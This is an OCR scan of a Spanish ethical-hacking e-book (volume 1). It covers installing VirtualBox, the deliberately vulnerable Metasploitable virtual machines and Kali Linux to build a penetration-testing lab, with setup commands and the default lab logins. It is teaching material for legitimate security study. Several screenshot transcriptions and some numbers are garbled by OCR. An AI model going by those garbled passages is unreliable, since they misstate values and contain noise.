Está en la página 1de 97
Tmt ts eee TL ey TFT vulnerables Bee OC Trey) HACKING ETICO Hacking j y i, i P * * d | | ae : u ay a a) re d a Pee) iy 4 OE aay bees cay bod Hacking ate 1 hee i ey Ty Tee a Hacking Etico Volumen | Entorno de pruebas Sistemas vulnerables Uso de Nmap CPE Titulo: Hacking ético - Vol.1: Entorno de pruebas. Sistemas vulnerables. Uso de Nmap / Autor: Fernando Castillo Coordinador editorial / Edicién: Claudio Peita Produccién grafica: Gustavo De Matteo / Coleccion: USERS ebooks - LPCU 313 Copyright © MNXX. Es una publicacién de Six Ediciones, Hecho el depdsito que marca la ley 11723. Todos los derechos reservados. Esta publicacién no puede ser reproducida ni en todo ni en parte, por ningin medio actual o futuro, sin el permiso previo y por escrito de Six Ediciones. Su infraccién esta penada por las leyes 11723 y 25446. La editorial no asume responsabilidad alguna por cualquier consecuencia derivada de la fabricacién, funcionamiento y/o utiizacién de los servicios y productos que se describen y/o analizan, Todas las marcas mencionadas en este libro son propiedad exclusiva de sus respectivos duefios. Libro de edicion argentina. Castillo, Fernando Hacking ético: Vol.1: Entorno de pruebas. Sistemas vulnerables. Uso de Nmap / Femando Castillo, -1a ed. - Ciudad Auténoma de Buenos Aires: Six Ediciones, 2020. Libro digital, PDF/A Archivo Digital: online ISBN 978-987-8414-03-4 1, Computaci6n. 2. Sistemas Operativos. 3. Seguridad. I. Titulo. CDD 005.8 glvageralara Prologo El hacking siempre ha despertado interés en todos los aficionados a la tecnologia. Debes saber que no todos los hackers son delincuentes ni toda actividad relacionada con ellos es ilegal, pues existe una rama importante denominada hacking ético, que se preocupa de analizar los sistemas informaticos corporativos y los programas con el fin de aclarar el estado de la seguridad. En forma concreta, se trata de asumir el rol de un ciberdelincuente para simular ataques a cierto sistema y, de esta forma, evaluar el estado real de su seguridad. Las acciones realizadas por un hacker ético tratan de adelantarse a los cibercriminales, solucionando cualquier debilidad que pueda provocar un posible ataque. Ademas, buscan concientizar a las compajiias sobre la importancia de mantener la seguridad informatica y, también, de mejorar los procesos de seguridad mediante planes de respuesta y accion ante los incidentes. @ Este e-book incluye, al final de cada capitulo, una \ serie de Actividades para que puedas autoevaluarte. Asimismo, cada vez que veas la sefial de la derecha, significara que encontraras material + adicional disponible en el archivo de contenidos , J k i complementarios que puedes descargar AQUI a Acerca de esta coleccion En esta colecci6n se revisan las acciones que puedes realizar para analizar y explotar un sistema objetivo. De esta forma, estaras en los zapatos de un hacker ético mientras realizas intrusiones en un sistema objetivo y logras obtener informacion o efectuar analisis de seguridad. En cada e-book se iran presentando diferentes formas de explotar y analizar un sistema objetivo, asi como también aprenderas a montar un entorno de pruebas para poder ensayar tus habilidades sin utilizar sistemas externos. Volumen | : Aqui se presenta el concepto de hacking ético, aprenderés a configurar un entorno de pruebas y, también, conoceras los sistemas vulnerables y el uso de Nmap. Volumen II: En este volumen revisaras a fondo el Shell Scripting, conoceras la forma en que puedes capturar informacién, y como seleccionar objetivos para las tareas de andlisis y extraccién de informacién. Volumen Ill: Aqui se presentan los conceptos relacionados Hacking con el mapeo de vulnerabilidades de un sistema objetivo, y se analiza el proceso de explotacién y posexplotacién. pa Volumen IV: En el ditimo e-book de esta coleccién, aprenderas a realizar el ataque Man in the middle y, también, conoceras a fondo Metasploit y Nessus. Contenido (ND UUEON {Qué se necesita? Laboratorio de pruebas / 9 VirtualBox / 10 Crear una maquina virtual general Metasploitable / 17 Configurar una maquina virtual Metasploitable - Metasploitable 2 - Metasploitable 3 Kali Linux / 28 Conectar ambas maquinas virtuales / 34 Actividades / 34 Test de autoevaluacién - Ejercicios practicos Cai tehy Vuinerabilidades y pruebas Sistemas vulnerables / 36 Metasploitable 2 / 36 Puerto 24 - Puerto 6667 - Otras puertas traseras - ,Y las contrasefias? Metasploitable 3 / 47 Prueba de penetracion / 48 Black Box / 49 White Box / 49 Grey Box / 50 Actividades / 51 Test de autoevaluacion - Ejercicios practicos (oN hit Ree} Escaneo con Nmap Opciones disponibles / 53 Puertos para analizar / 59 Duracion del escaneo / 60 Escaneo con Nmap / 61 Opciones adicionales / 76 Interfaz grafica / 82 Actividades / 94 Test de autoevaluacion - Ejercicios practicos Glosario / 95 Nuestros expertos comparten su saber y experiencia Calidad y cantidad por una minima cuota mensual Cientos de publicaciones con los temas que més interesan Siempre, donde vayas. On Line — Off Line. En cualquier dispositivo Al menos 1 novedad semanal. Lee todo lo que desees sin limites SUSCRIBETE 92" Dr Capitulo 01 éQué se necesita? Antes de comenzar a realizar las primeras tareas de hacking €tico, debes armar el laboratorio de trabajo; esto incluye diversas herramientas que conoceras en este capitulo. Laboratorio de pruebas / 9 VirtualBox / 10 Crear una maquina virtual general Metasploitable / 17 Configurar una maquina virtual Metasploitable Metasploitable 2 Metasploitable 3 Kali Linux / 28 Conectar ambas maquinas virtuales / 34 Actividades / 34 Test de autoevaluacion Ejercicios practicos Laboratorio de pruebas Las tareas de protecci6n de sistemas y redes requieren tener una amplia comprensién de las estrategias de ataque existentes y, también, un conocimiento acabado de cada una de las tacticas, herramientas y motivaciones de quienes realizan este tipo de ataques. Estos conocimientos son los que definen a un hacker ético pues en general se trata de personas dedicadas a identificar y reparar posibles vulnerabilidades, lo que previene en forma eficiente la explotacién de estas por hackers malintencionados. Entonces, un hacker ético se especializa en pruebas de penetraci6n de sistemas informaticos y en el uso de software de seguridad con el fin de analizar, evaluar, detectar agujeros, fortalecer y mejorar la seguridad de un sistema o una red. En definitiva, es un tipo especial de pirata informatico conocido también como hacker de sombrero blanco o white hat, para separarlo de los piratas informaticos criminales o hackers de sombrero negro. En esta coleccion aprenderas los fundamentos para realizar diversas tareas de hacking ético desde GNU/Linux. Para lograrlo, la primera tarea es configurar tu laboratorio de pruebas, es decir, un espacio donde poder ejecutar los andlisis y las pruebas de seguridad necesarios, sin que debas utilizar entornos o sistemas en producci6n para buscar vulnerabilidades 0 probar herramientas de ataque, pues podrias ser acusado de pirata informéatico al intentar acceder sin permiso a ciertos sistemas. Para protegerte y teniendo en cuenta que las actividades que se deben realizar en algunos momentos pueden rayar en la linea de la ilegalidad, es una excelente idea que estas pruebas y andlisis se realicen en entornos controlados, donde no sea necesario causar problemas o molestias accediendo a maquinas ajenas. A diferencia de lo que se puede pensar, configurar un laboratorio de pruebas no requiere contar con una red de computadoras listas para ser blanco de tus ataques ni de las bsquedas de vulnerabilidades, mas bien debes recrear un sistema vulnerable al que 1. gQué se necesita? puedas acceder para analizar y probar tus habilidades. La creaci6n de un sistema vulnerable no es una tarea tan compleja, pues existen maquinas virtuales programadas con ciertas vulnerabilidades y son estas las opciones adecuadas para probar lo que aprendas a lo largo de esta coleccion. Para armar tu laboratorio de pruebas necesitards tres integrantes basicos: VirtualBox, Kali Linux y Metasploitable. A continuacién veras como puedes obtenerlos ¢ instalarlos. VirtualBox La virtualizacion de plataformas 0 sistemas puede conseguirse utilizando como base cualquier VirtualBox sistema operativo, por lo tanto, una distribucién Linux no es la excepcion. Por ejemplo, dentro de Ubuntu es posible instalar una version de Windows 0, en este caso, los sistemas que se requieren para configurar tu laboratorio de Figura 1.4. pruebas. Si estuvieras ante la necesidad de instalar y utilizar solo una aplicaci6n creada para otro sistema, puedes usar Wine, pero al tratarse de la virtualizacion de un sistema operativo completo debes optar por VirtualBox u otra alternativa similar (Figura 1.1). Aunque lograr la virtualizacion gracias a VirtualBox es una tarea bastante sencilla, debes tener en cuenta un detalle importante, el sistema operativo que quieres virtualizar debe consumir menos recursos que el hardware que tiene la maquina huésped. Esto es muy importante pues de no cumplirse podrias encontrarte con que el equipo huésped no responde durante un tiempo o que se suspende la actividad del software por seguridad. Una de las opciones comerciales mas completas y potentes para virtualizar sistemas operativos pertenece a VMware, pero también puedes acceder a una excelente alternativa gratuita: VirtualBox, que puede ser instalado en cualquier distribuci6n Linux y también en Windows 0 MacOSX. VirtualBox es de cédigo abierto y multiplataforma; esto permite, entre otras cosas, que puedas crear maquinas virtuales en un sistema Windows para después trasladarlas a una computadora con GNU/Linux y lograr su funcionamiento. Entre las caracteristicas mas destacadas de esta aplicacién de virtualizacion, se encuentra la posibilidad de crear un disco duro virtual segmentado, es decir, que puede aumentar su capacidad o hacer uso de esta capacidad de almacenamiento en funci6n del uso que le des. Por otro lado, te permite crear méquinas virtuales que pueden ser transportadas como si fueran documentos o imagenes. Instalar VirtualBox en Linux, al igual que sucede con otras aplicaciones, puede lograrse de varias formas, por ejemplo, a través de los repositorios oficiales 0 mediante la descarga del paquete de instalacion en sistemas Windows. Si utilizas los repositorios oficiales, obtendras una versi6n estable y funcional de VirtualBox, pero no la ultima versién del programa, aunque sin duda se trata de la forma mas difundida y segura de realizar la instalaci6n. VirtualBox se encuentra disponible en los repositorios de las principales distribuciones GNU/Linux, por lo tanto, solo necesitaras buscarlo en la interfaz de Centro de Aplicaciones que corresponda a tu distribuci6n o abrir una consola de comandos para ejecutar lo siguiente para instalar VirtualBox en una distribucién Ubuntu, Debian o cualquiera derivada. sudo apt-get install virtualbox 1. gQué se necesita? Para Arch Linux o alguna @istribUGiOn derivada, debes ejecutar lo siguiente: sudo pacman -S virtualbox Para Fedora, Red Hat 0 una distribucién derivada, debes ejecutar el siguiente codigo: sudo dnf install virtualbox Por otra parte, si utilizas SUSE Linux, OpenSUSE 0 cualquier distribuci6n derivada, tendras que ejecutar el siguiente cddigo: sudo zypper install virtualbox Una opci6n para instalar VirtualBox es acceder al sitio web oficial www.virtualbox.org para descargar el paquete de instalacion preparado para tu sistema operativo. Esto te permitira obtener la ditima version de VirtualBox, pero debes considerar que puede no estar probada con ciertas distribuciones especificas, por lo que podria presentar algunas fallas (Figura 4.2.). Si estas en Linux, una vez instalado puedes controlarlo en forma directa desde la Terminal de comandos. El comando principal para controlar VirtualBox es VBoxManage, pero debes acompajiarlo de los siguientes subcomandos o pardmetros. Para mostrar una lista de las maquinas virtuales, escribe lo siguiente: VBoxManage list vms Download VirtualBox Here you wil find links to VirtualBox binaries and its source code. About VirtualBox binaries Screenshots By downloading, you agree to the terms and conditions of the respective license, Deperaoate If you're looking for the latest VirtualBox 6.0 packages, see VirtualBox 6.0 bulds, Peace also use a discontinued in 6.1. Version 6.0 will remain supported uni July 2020, End-user docs __If you're looking forthe latest VirtualBox 5.2 packages, see VirtualBox 5.2 builds. Please also use 6.0. Version 5.2 will remain supported until July 2020. Technical docs Contribute VirtualBox 6.1.6 platform packages community + Windows hosts + 9:08 x hosts + Lnux distributions + Solaris hosts ‘The binaries are released under the terms of the GPL version 2, ‘See the changelog for what has changed. You miaht want to comoare the checksums to verify the intearltv of downloaded nackaaes. The Sb Figura 4.2. El instalador de VirtualBox estd disponible para sistemas Windows, OSX, Linux y Solaris. En la misma Terminal de comandos veras un listado como el siguiente: Oracle VM VirtualBox Command Line Management Interface Oracle Corporation All rights reserved. “winl@” {3£157880-c642-4be2-b641-85d7aedb5090} “Linux-Mint” {c25e1257-dfed-4789-a22b-8489c4d4df@5} “ubuntu” {fee70808-ab0e-473a-8991 -d9b711773672} “slackware” {f65d5b26-6491-4523-8c@6-970cbe6844d5} “peppermint” {32b1845f-dd72-4c8a-bfe7-8cc3e83d0109} Para obtener informacién detallada de cada una de las maquinas disponibles, usa el siguiente comando: 1. Qué se necesita? VBoxManage list vms -1 Para iniciar una maquina virtual de VirtualBox, utiliza el comando startvm seguido del nombre de la maquina virtual: VBoxManage startvm “slackware” VBoxManage startvm f65d5b26-6491-4523-8c06-970cbe6844d5 Para pausar una maquina virtual escribe: VBoxManage controlvm “slackware” pause Para reanudar una maquina virtual pausada escribe: VBoxManage controlvm “slackware” resume Para reiniciar una maquina virtual (apagarla y encenderla nuevamente): VBoxManage controlvm “slackware” reset Para apagar una maquina virtual: VBoxManage controlvm “slackware” poweroff Para detener la maquina virtual, pero guardando su estado actual: VBoxManage controlvm “slackware” savestate Si necesitas crear una maquina virtual con las opciones predeterminadas, desde la Terminal de comandos ejecuta lo siguiente: VBoxManage createvm -name “LinuxMint” -register Crear una maquina virtual general Para crear una maquina virtual tanto en Windows como en Linux utilizando el apartado grafico, deberdas iniciar VirtualBox y seguir las instrucciones mencionadas a continuaci6n. Una vez iniciado VirtualBox haces clic sobre el bot6n Nueva, que se encuentra en la barra superior de opciones. 1. gQué se necesita? En la ventana que aparece, escribe el nombre con el que identificaras la maquina virtual, luego elige el tipo y la versi6n de SO que virtualizaras. Haz clic en Siguiente. Elige el tamafio de memoria’ RAM que dedicaras al sistema virtualizado, teniendo cuidado de no asignar mas de la mitad de RAM real del sistema huésped. Presiona Siguiente. Marca la opcién Crear un disco duro virtual ahora y haz clic sobre Crear. En la pantalla que se presenta, elige VDI (se trata de la opcién predeterminada) y presiona Siguiente. TT x Nombre y sistema operativo Steere rontre extpbo px aruda italy ere donde SSenospeano ge ear enc, Sratre ga Ee odor ron pra craic ea srs sabes fe Two: [Pacrosah Wrens =A vernén: [inane 8 OB) a Tamatio de memoria Salecone a canta de menor RAM) en megabytes a ered prals core wrt tana de menor reconerdade es 10246, fas “6 Tipo de archivo de disco duro oc ae suse bose Se ee Se = xa na) © wo urate) © ox restacnne 6 wince] cine |[Seim>] come Elige la opcién Reservado dindmicamente y presiona Siguiente, luego escribe un nombre para identificarlo y desliza el control para definir el tamafio maximo; presiona Crear. Luego de esto, nuestra maquina virtual estaré lista. Metasploitable Existen diversas herramientas que pueden ayudar a validar y llevar a cabo pruebas en relacion con la seguridad de un sistema Operativo, pero sin duda la mejor opcién es realizar las pruebas de penetraci6n y vulnerabilidad en el propio sistema operativo para comprobar los problemas de seguridad en detalle y en contexto. oc aa ‘Almacenamiento en unidad de disco duro fisica Senco n dein Seas cn as ant moana tart nar de aca reserva éndmicamente sb rd czace oy ds fo BER TSI Res ntane tame po snoop meneame nar de daca coe tama igre tere mds ter pre esa en os x romaine eouareearaect, © Tansee —vsee |S] coe | En este sentido puedes hacer uso de Figura 1.3. Metasploitable, un sistema operativo disefado teniendo en cuenta que puede ser vulnerado para que logres ensayar las pruebas de penetracion con el fin de mejorar la seguridad y prevenir los ataques (Figura 1.3). Metasploitable te provee diversas vulnerabilidades de seguridad para llevar a cabo todas las pruebas necesarias que te permitan perfeccionar las técnicas de seguridad. Este sistema, en su version Linux, no cuenta con entorno grafico y debes utilizarlo en redes privadas debido a su tolerancia a ataques. 1. EQué se necesita? Es un sistema de B6diBOAbIERO y te permit realizar pruebas de vulnerabilidades en archivos incrustados, atributos de archivo, permisos, entre otros. Para utilizar Metasploitable en tu laboratorio de pruebas, necesitas contar con dos elementos: @ VirtualBox, que ya instalaste en la seccion anterior. © Disco virtual de Metasploitable, que conseguiras a continuacién. Metasploitable, en sus primeras versiones, funcionaba como una distribuci6n Linux especialmente configurada para ser vulnerable; en su version 3, toma como base Microsoft Windows Server 2008 R2, pero por restricciones de licencia no te pueden proporcionar una maquina ya lista, sino que debes generarla ti mismo. Para comenzar el trabajo en esta colecci6n, se utilizara la maquina de Linux ya configurada. Para obtener el disco de Metasploitable adecuado, debes acceder a la direccién https://information.rapid7.com/download-metasploitable-2017.html, completar los datos requeridos por el formulario y presionar Submit. Es importante tener en cuenta que, para realizar la descarga de Metasploitable, necesitas contar con un correo electrdnico corporativo, de lo contrario no podras pasar del formulario. RAPID. Metasploitable - Virtual Machine to Test Metasploit ‘Thank you for registering for Metasploitable ‘Bo you hae scopy ote se ssn Metall? ts hace ya pe see commune 2969¢ members, vee ou aight shea peal pr ing stone Figura 1.4. En la pantalla que se presenta haz clic sobre DOWNLOAD METASPLOITABLE NOW, la descarga supera los 800 MB. Una vez que Metasploitable complete su descarga, inicia VirtualBox y haz clic sobre Nueva. Como nombre de la maquina escribe Metasploitable y elige Linux, Ubuntu (64 bits). Bienvenido a VirtualBox! La parte izquerda de esta ventana contene la sta de mécunas 2x!) Nombre y sistema operativo ‘Seleccione un nombre descriptive parala nueva maquina virtual y seleccione el tipo de ‘sstema operativo que bene intencién de instalar en ela Ei nombre que seleccone sseré usado por VirtualBox para identificar esta maquina. areal || Re cai Figura 1.5. Aunque no es imprescindible que el nombre de la nueva maquina virtual sea Metasploitable, es una buena idea para diferenciarla de otras maquinas ya creadas. En la siguiente ventana deja la memoria RAM asignada en forma predeterminada, es decir, 1824 MB. Para continuar, crea un disco duro virtual con la opcién VDI y Reservado dindmicamente. En la siguiente ventana, define una ruta donde almacenar la maquina virtual y asigna la capacidad minima del disco duro que permite la aplicacién: 1@ GB. Pulsa sobre Crear para completar el proceso (Figura 1.6.). 1. gQué se necesita? pastebin oe atmartind gn, Ps on oi ‘events te one cera corepeata sre Sasa ennashcrmrssonvoseer hare, ace ontraratiert rosin mtstarinnns DD, Ca ietisteriagresnesmeccan yore. — erence ee dela a 4 cn om fmakt asmceereerarmearetenecreceees ome Sbeed acon aniars “atontiness rergmer ara cost preerinse enganeetia )Shcoestmcnas = (cospa a sokcometey pom meusnes ome gaa, ne sage (al) Sear yoberen os obec: Poe ce OS ST me Figura 4.6. Luego de completar las indicaciones anteriores, la maquina virtual denominada MetaspLoitabLe ya estard creada. Configurar una maquina virtual Metasploitable Ahora que tu maquina virtual de Metasploitable ya esta creada, debes configurarla. Para ello, selecciénala y haz clic sobre Configuracién, elige Almacenamiento y pulsa sobre el disco duro virtual llamado Metasploitable.vdi. Pulsa sobre el icono ubicado al lado del campo Disco duro y elige la opci6n Seleccione archivo de disco duro virtual; en la ventana desplegada, ubica el disco duro virtual de Metasploitable que descargaste en la secci6n anterior (Figura 1.7.). Antes de elegir la imagen de disco, sera necesario descomprimir el archivo descargado, luego de esta operaci6n su peso superara los 1.90 GB. Haz clic sobre Aceptar para completar la configuracion, luego presiona Iniciar para arrancar la maquina virtual y completar el proceso de instalacion (Figuras 1.8 y 1.9.). a Nombre: [ide | ar cache de) anferén oe ee8 continent detect a Figura 4.7. En la seccion Atributos/Disco duro puedes elegir la imagen de disco virtual que utilizards para arrancar tu maquina virtual. Loading manual driver Svar eames SCs Pees ree prareecaee Cees riay /napper/netasploitable-root has gone 2905 days without being checked, c (ee eee CL Cer 7 files (0.3% non-contiguous) iors or Cerne 1.40.8 (13-Har-Z008) deu/sda1 has gone 2905 days without being checked, check forced Cer SEE 22 Ot Ce CARR ST eS oe eee Cesc acre accents Mounting securityfs on /sys/kernel/security Loading AppArmor profiles : done Sores erie tts cma try Saeed ero) Smee) sre arco Sorrstre eerste Stree eee eet eT Figura 4.8. Mientras las tareas necesarias se realizan, verds la indicaci6n de los procesos en pantalla, tal como si estuvieses realizando la instalacién or en una maquina fisica. 1. EQué se necesita? Preset ferent mers ee teess Tomcat servlet engine toncatS Pe eee tt rma s See eC) rere Soares appending output to ‘nohup.out’ Pe ee ee eC cee ec Mee ay Contact: nsfdevlatInetasploit.con Pero eee Cen aeert orn eed Figura 1.9. Una vez que la instalacién se complete, te encontrards con esta pantalla, que solicita los datos de ingreso al sistema. El proceso de instalacién puede tardar unos cinco minutos, una vez completado utiliza las siguientes credenciales de acceso: Usuario: msfadmin Contrasefia: m: ‘admin Metasploitable 2 Metasploitable 2 es una evolucion de la maquina virtual original, que incorpora problemas de seguridad mas actuales para ser explotadas. Para utilizar esta opcion, debes seguir un procedimiento similar al que se explic6 para Metasploitable: 1. Descarga Metasploitable 2. 2. Descomprime el archivo descargado para obtener la imagen de instalaci6n. 3. Crea una nueva maquina virtual en VirtualBox. 4. Instala Metasploitable2. En primer lugar dirigete a la direcci6n: http: rceforge.n: 1 ‘mi loitable para descargar Metasploitable 2. SOURCEFORGE Metasploitable d es Sire $ cient Parent folder tmetayplotanesi:2002 aorvoe19 asa Ma ws @ README 20120613 —_s69.ytes en) Figura 1.10. En la seccién Files de esta web puedes ver el detalle de la descarga, observa que el archivo que contiene la imagen comprimida posee un tamario de 865.1 MB. Una vez que la imagen ha sido descargada la descomprimes. Luego de esto obtendras cuatro archivos, uno de ellos con la extensi6n .vmdk. Ahora inicia VirtualBox y crea una nueva maquina virtual; sigue las indicaciones del asistente para configurarla, indicando el archivo con extensiGn .vmdk como imagen de disco de arranque. Para elegir los detalles puedes copiar las instrucciones indicadas en la seccidn anterior, sobre la instalacion de Metasploitable. Una vez que la instalaci6n finalice, utiliza los siguientes datos para iniciar una sesi6n de trabajo: Usuario: msfadmin Contrasefia: msfadmin 1. gQué se necesita? Metasploitable 3 Hasta ahora se ha analizado la instalacion de Metasploitable y Metasploitable 2 como maquinas vulnerables. Se trata de opciones que quienes estan relacionados con el Ethical Hacking y el test de penetracién han utilizado por aiios, ya sea para pruebas de explotacin de red, desarrollo de exploits, evaluaci6n de software, identificacién de vulnerabilidades, entre otras opciones. Metasploitable y Metasploitable 2 se presentan como un disco duro que se instala en forma sencilla sobre Vmware 0 VirtualBox en este caso, y hace algtin tiempo surgié una versi6n 3. Metasploitable 3 posee una |égica diferente y, por lo tanto, su instalacién se realiza de una forma también distinta. Esta nueva maquina presenta una serie de vulnerabilidades mas actuales, que resultan interesantes para desarrollar diversas habilidades relacionadas con la seguridad. A diferencia de las versiones anteriores de Metasploitable que se ofrecian como maquinas virtuales ya preparadas, esta nueva opcién depende de Vagrant y Packer para compilar la imagen en el sistema. De esta forma es mas dinamica y permite que los usuarios participen en su generaci6n, esta disponible con los sistemas Windows Server 2008 y Ubuntu 14.04 como base. Para utilizar estas maquinas virtuales, es necesario contar con un sistema operativo compatible con las dependencias que debes instalar, ademas con un procesador que soporte las funciones de virtualizaci6n (VT-x 0 AMD-V), 4.5 GB de memoria RAM y 65 GB de espacio en el disco duro. Se trata de altas exigencias, por lo que es una buena idea comenzar con las versiones anteriores de Metasploitable, al menos en los primeros pasos en las tareas de explotar vulnerabilidades. En cuanto a las dependencias, necesitas contar con las herramientas Packer, Vagrant, Vagrant Reload Plugin y, por supuesto, con un sistema de virtualizacion como VMWare 0 VirtualBox (el que se utiliza en esta colecci6n). Es posible que te des a la tarea de compilar tt mismo la imagen o también descargar las versiones ya compiladas; esta Ultima opcidn es la mas sencilla. Para compilar la maquina virtual primero instala los prerrequisitos. Para instalar Packer: wget https://releases.hashicorp.com/ packer/1.1.3/packer_1.1.3_linux_amd64.zip?_ a=2.259436163.8806393. 1516559508 -2105737727.15165595e8 -0 packer_1.1.3_linux_amd64. zip unzip packer_1.1.3_linux_amd64.zip sudo mkdir /usr/local/packer sudo mv packer /usr/local/packer/ nano ~/.profile Al final del archivo agrega lo siguiente: export PATH=$PATH: /usr/local/packer Luego ejecuta: source ~/.profile Y finalmente: packer -version Deberias ver un mensaje que muestre la version de Packer instalada. Para instalar Vagrant, escribe los siguientes comandos: 1. gQué se necesita? wget https://releases.hashicorp.com/ vagrant/2.@.1/vagrant_2.0.1_x86_64.deb?_ a=2.260144013.1615441903.1516560525- 1954706866 .1516560525 -O0 vagrant_2.@.1_x86_64.deb sudo dpkg -i vagrant_2.0.1_x86_64.deb vagrant plugin install vagrant-reload Ahora, para realizar la instalacidn de Metasploitable3: git clone https://github.com/rapid7/metasploitable3.git cd metasploitable3/ Luego de esto comienza con la construccidn de la maquina virtual, en el caso de la maquina de Windows 2008: packer build windows_2@@8_r2.json Ahora debes esperar a que la descarga se complete. Una vez que este proceso haya terminado, ejecuta el siguiente comando: vagrant box add windows_200@8_r2_virtualbox.box - name=metasploitable3 Después, la importas hacia VirtualBox: vagrant up Si no quieres realizar el proceso de compilacion o te encuentras con algun problema complejo, puedes descargar las versiones ya compiladas, para ello procede de la siguiente forma. Bringing machine ‘default! up with ‘virtualbox’ provider Ocoee oe er aC nyc SES ae eee area Se er eae note ee ocr mre > default: Clearing any previously set network interfaces. > default: Preparing network interfaces based on configuration. EN ers ynrtas ets Ft eon a? defau re ante mre ota Pe enter eon) es amernsetasy See a Reece Peet) en memset Se one en te ppmesartr ier ts default: Win Peasant erst Siearnomrnretas Pane ee et Pn ere ceeC ns default: Setting hostnane ENT emont ee tretr beret default: Mounting shared folders Pe pte nenteneayomarr itty default: Running provisioner: shell... ES entsa mite messtioien th coricart Pee er eomeee ES ens Tite meareyeetee cr matt Figura 1.41. Con esto ya terminas la construccién de la maquina virtual, que ya estard disponible en Ia lista de maquinas de VirtualBox. Si deseas contar con Metasploitable 3 basado en Windows Server 2008, debes ejecutar lo siguiente en Vagrant: Vagrant .configure(“2”) do |config| config. vm.box = “rapid7/metasploitable3-win2k8” config.vm.box_version = “@.1.@-weekly” end Si deseas montar Metasploitable3 basado en Ubuntu 14.04, sera necesario ejecutar el siguiente box en Vagrant: 1. gQué se necesita? Vagrant .configure(“2”) do |config| config.vm.box = “rapid7/metasploitable3-ub1404” config. vm.box_version = “@.1.12-weekly” end Kali Linux Kali Linux es una distribuci6n basada en Debian; se trata de un sistema operativo desarrollado para realizar pruebas avanzadas de penetracion y auditorias de seguridad que permiten conocer en tiempo real el nivel de seguridad Figura 1.12. de un sitio, una arquitectura de red, un sistema o una implementaci6n de aplicaciones (Figura 1.12). Esto se logra gracias a la integracidn de mas de 600 herramientas disefiadas para este fin. Para agregar Kali Linux a tu laboratorio de pruebas, accede a la direcci6n https://www.kali.org/downloads/ y elige la imagen de disco adecuada, ya sea para instalar o para ejecutar en forma de sistema Live, es decir, sin instalarla en el disco. Como una opcién adicional, en este sitio web también puedes acceder a la descarga de una imagen de Kali Linux especialmente preparada para VMWare 0 para VirtualBox. En este caso se ha elegido la opcién Kali Linux VirtualBox 64-Bit (Figura 1.13). Inicia VirtualBox y haz clic sobre Importar servicio virtualizado; elige el archivo de Kali Linux descargado y presiona Abrir. Verifica los datos contenidos en la pantalla Preferencias de servicio yhazclic sobre Importar (Figura 1.14). aed eed ony ee eee a Figura 1.43, Por tratarse de un archivo que supera los 3 GB, puedes utilizar el archivo torrent para descargarlo. aoe, >, ow Preferencias de servicio Estas son las méquinasVrtualas contends ono sarvicioy las preferencias sugerdas de las méquinasvirtvales importadas de VirtualBox. Puede cambiar = propedades mostradas haciendo doble cic en los elamenos y 5 otras usando la casas do abajo. Sistema virtual 1 @ Nombre Kali-Linux-2020.1-vbox.. D Producto Kall in D UNL dol producto bitpeswwwkaliorg! Vendedor Offensive Securty 3 URL del vendedor btps/iwww offensive. O Versién Roling (2020.1) x64 Reinicializarladteceién MAC de tds ls tarjetas de rec Servico virtualizado no firmed Restaura valores predeterminades _Precedente J cancelar Figura 1.14. En Preferencias de servicio se listan todos los detalles relacionados con la maquina virtual que estas importando, en este caso Kali Linux. 1. gQué se necesita? Luego debes esperar mientras la importacion se realiza. Esto tardaré varios minutos y, una vez que este proceso termine, veras la maquina Kali Linux en la lista de maquinas disponibles. Para iniciarla solo debes hacer clic sobre ella y elegir Iniciar en el mend superior de opciones. Luego de iniciarla puede presentarse un error en el puerto USB 2.0, debes deshabilitarlo y volver a iniciar la maquina virtual; puedes hacerlo en la secci6n Configuracién/Puertos/USB. Para solucionarlo por completo, instala el paquete de extras de VirtualBox una vez que la maquina se haya iniciado. Kali-Linux-2020.1-vbox-amd6¢ [Running] 200Cm=5 Ce mS roan Pe t°Y) Figura 1.45. Una vez que el sistema haya arrancado, puedes utilizar kali/kaLi como datos de usuario/contrasefia. Luego de eso te encontraras en el escritorio de Kali Linux. @ Conectar ambas maquinas virtuales En este punto ya tienes VirtualBox instalado y dos maquinas virtuales funcionando, una con Metasploitable y otra con Kali Linux. Lo que necesitas es que ambas puedan verse, es decir, que funcionen en la misma red, de esta forma accederas a Metasploitable desde Kali Linux para realizar las tareas de andlisis de seguridad. Para lograr que ambas maquinas estén en la misma red, ajusta sus configuraciones. En primer lugar, elige Metasploitable desde el listado de maquinas virtuales de VirtualBox y haz clic sobre Configuracion. Ve a la seccién Red yen Conectado a elige Adaptador puente. Repite este procedimiento en la maquina virtual de Kali Linux. Adaptador puente es una forma util para conectar las maquinas virtuales. Se trata de un tipo de conexidn que se encarga de simular una conexi6n fisica a la red de la maquina virtual. Asi, la maquina virtual quedara conectada a través de un adaptador de red creado en la maquina host en forma directa al router o al servidor de tu entorno de red. Con este procedimiento, cada maquina virtual obtendra una direcci6n IP desde la puerta de enlace a internet, por lo que dentro de tus maquinas virtuales tendras las mismas posibilidades que si estuvieras frente a un equipo fisico. Ahora debes iniciar ambas maquinas virtuales y averiguar la direcci6n IP de cada una; para ello ejecuta el comando ifconfig en la terminal de Kali Linux y también de Metasploitable (Figura 1.16 y 1.17). Aunque después de verificar las direcciones IP no es necesario ejecutar un Bing para realizar un rastreo de paquetes, igual puedes hacerlo como una forma adicional de verificar la conexi6n entre ambas maquinas. Abre la terminal de comandos en Kali Linux y escribe lo siguiente: ping 192.168.1.101 CC CT) ene eT eure [sudo] password for kali ethe: Flags=4163 tu 15 inet 192.168.1.100 netmask 255.255.255.0 broadcast 192.168.1.255 eC See arnt mrs cms attr Sica reece tC eT MC as) ae MOR Meee) RK errors © dropped 2 overruns 0 frame @ TX packets 105 bytes 9599 (9.3 KiB) TX errors @ dropped @ overruns @ carrier @ collisions 0 Tea ee a ee ed rar em) ineté ::1 prefixlen 128 scopeid @x10chost> mcm mcs mer si) RX packets 8 bytes 396 (396.0 8) De OR eo e eee) TX errors @ dropped @ overruns @ carrier @ collisions 0 atiniati-$ ff Figura 1.16. Luego de ejecutar el comando sudo ifconfig, verificards que, en este caso, se ha asignado la direccién IP 192.168. 1.100 a la maquina con Kali Linux. Se a aT ear) ieee a ae Ce eee eed inet addr:192,168,1.101 Beast :192.168.1.255 Mask:255.255.255.0 Ronee eC iret een atyy eee Cm eet a eee eee eer ee ee rete rete) eet eC eer ee eT te mrt ee erty ct) Poca eer tera RX bytes:300165 (293.1 KB) 1X bytes:182893 (178.6 KB) Peete CM Uno errr) Link encap:Local Loopback metres ee eM etree) etter eee es A ee CMe UES Crea Creatas et arse Ce eet eC eee) eae Seater ery etre tLSee ts Co) collisions: txqueuelen:0 aneert 4 Me Me eer Cre) Pee Cree SEE Figura 